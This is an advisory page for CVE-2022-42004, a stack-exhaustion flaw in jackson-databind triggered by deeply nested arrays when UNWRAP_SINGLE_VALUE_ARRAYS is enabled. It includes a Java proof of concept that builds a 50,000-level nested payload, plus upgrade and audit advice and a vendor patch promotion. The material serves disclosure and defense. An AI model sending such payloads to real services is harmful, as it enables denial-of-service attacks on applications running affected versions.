
CVE-2022-42004

Uncontrolled Resource Consumption in FasterXML jackson-databind

Description

In FasterXML jackson-databind before 2.12.7.1 and in 2.13.x before 2.13.4, resource exhaustion can occur because BeanDeserializer._deserializeFromArray lacks a check that would stop it from recursing into deeply nested arrays: each extra level of `[` is unwrapped by another recursive call, so an attacker-controlled document with enough nesting exhausts the thread stack. The issue can only be triggered when the DeserializationFeature.UNWRAP_SINGLE_VALUE_ARRAYS feature has been explicitly enabled on the ObjectMapper; it is off by default. Upgrading to 2.12.7.1 or 2.13.4 (or later) fixes it.
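The following is an added illustration, not code from the jackson-databind project or from this page: it builds a constructed payload of a small POJO wrapped in many single-element arrays and feeds it to two mappers, one with UNWRAP_SINGLE_VALUE_ARRAYS enabled (the condition the description names) and one left at the default. The `Point` class, the nesting depth and the method names are assumptions for the demonstration. Run it against an affected 2.12.x/2.13.x build and against a fixed build to compare the outcomes.

```java
import com.fasterxml.jackson.databind.DeserializationFeature;
import com.fasterxml.jackson.databind.ObjectMapper;

public class UnwrapNestingDemo {

    /** Target type for the demo; any bean handled by BeanDeserializer will do. */
    public static class Point {
        public int x;
        public int y;
    }

    /** Builds a constructed payload: `inner` wrapped in `depth` levels of single-element arrays. */
    static String nestInArrays(String inner, int depth) {
        StringBuilder sb = new StringBuilder(inner.length() + 2 * depth);
        for (int i = 0; i < depth; i++) sb.append('[');
        sb.append(inner);
        for (int i = 0; i < depth; i++) sb.append(']');
        return sb.toString();
    }

    /** Deserializes `json` as a Point and reports what happened instead of propagating. */
    static String attempt(String label, ObjectMapper mapper, String json) {
        try {
            Point p = mapper.readValue(json, Point.class);
            return label + ": parsed Point(" + p.x + "," + p.y + ")";
        } catch (StackOverflowError e) {
            // Unbounded recursion in BeanDeserializer._deserializeFromArray on affected versions.
            return label + ": StackOverflowError (stack exhausted by nested arrays)";
        } catch (Exception e) {
            // A default mapper, or a patched build, refuses the input instead of recursing.
            return label + ": rejected with " + e.getClass().getSimpleName();
        }
    }

    public static void main(String[] args) {
        // Depth chosen so that one recursive call per level overruns a default thread stack
        // on an affected build; the exact threshold depends on the JVM's -Xss setting.
        String payload = nestInArrays("{\"x\":1,\"y\":2}", 50_000);

        // Vulnerable configuration: the feature that lets a bean be read from `[ value ]`
        // is switched on, which on affected versions also unwraps `[[ ... [ value ] ... ]]`.
        ObjectMapper unwrapping = new ObjectMapper()
                .enable(DeserializationFeature.UNWRAP_SINGLE_VALUE_ARRAYS);

        // Default configuration: the feature is off, so a bean at an array position is
        // a type mismatch and the document is rejected at the first `[`.
        ObjectMapper defaults = new ObjectMapper();

        System.out.println(attempt("UNWRAP_SINGLE_VALUE_ARRAYS enabled", unwrapping, payload));
        System.out.println(attempt("default features", defaults, payload));

        // The single-level case the feature exists for still works on either mapper config.
        System.out.println(attempt("single wrapper, feature enabled", unwrapping,
                nestInArrays("{\"x\":3,\"y\":4}", 1)));
    }
}
```

Things to check in your own code base: grep for `UNWRAP_SINGLE_VALUE_ARRAYS` (and for `ACCEPT_SINGLE_VALUE_AS_ARRAY` nearby, which is often enabled together with it) and confirm the mapper that parses untrusted input is not the one with the feature on; if it must be, the fix is the library upgrade named above. As defense in depth, jackson-core 2.15 and later also enforce a parser-level nesting limit through `StreamReadConstraints` (default maximum depth 1000), which is not mentioned on this page but caps this class of input before databind sees it.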

Patch Available

Fix available through Seal Security. No upgrade required; protect your application instantly.
Ecosystem: Java
Publish Date: October 2, 2022
Modified Date: December 2, 2024
Affected Versions: jackson-databind before 2.12.7.1; 2.13.0 up to but not including 2.13.4